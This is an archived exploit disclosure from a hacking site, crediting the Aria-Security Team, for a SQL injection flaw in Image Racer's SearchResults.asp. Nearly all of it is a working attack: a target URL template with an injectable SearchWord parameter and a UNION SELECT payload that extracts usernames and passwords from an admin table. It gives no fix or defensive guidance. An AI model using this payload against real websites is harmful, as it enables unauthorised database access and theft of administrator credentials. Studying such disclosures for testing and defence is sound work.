AOH :: HP Unsorted I :: TB11729.HTM

Image Racer SearchResults.asp SQL INJECTION vuln.



Image Racer SearchResults.asp SQL INJECTION vuln.
Image Racer SearchResults.asp SQL INJECTION vuln.



__________________

Aria-Security Team
__________________

Image Racer SearchResults.asp SQL Injection
Vendor: http://www.junctionquest.com/Software.asp 

Example:
http://www.TARGET.com/SearchResults.asp?SearchWord=[SQL COMMAND]&WordSearchCrit=Yes&image.x=0&image.y=0 

Example :
-1 'union select username,password from admin where [FIND IT YOUR SELF]=1

------------------------------------------------
Credits: Aria-Security Team 
http://aria-security.net/ 
Personal Blog: http://outlaw.aria-security.info 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.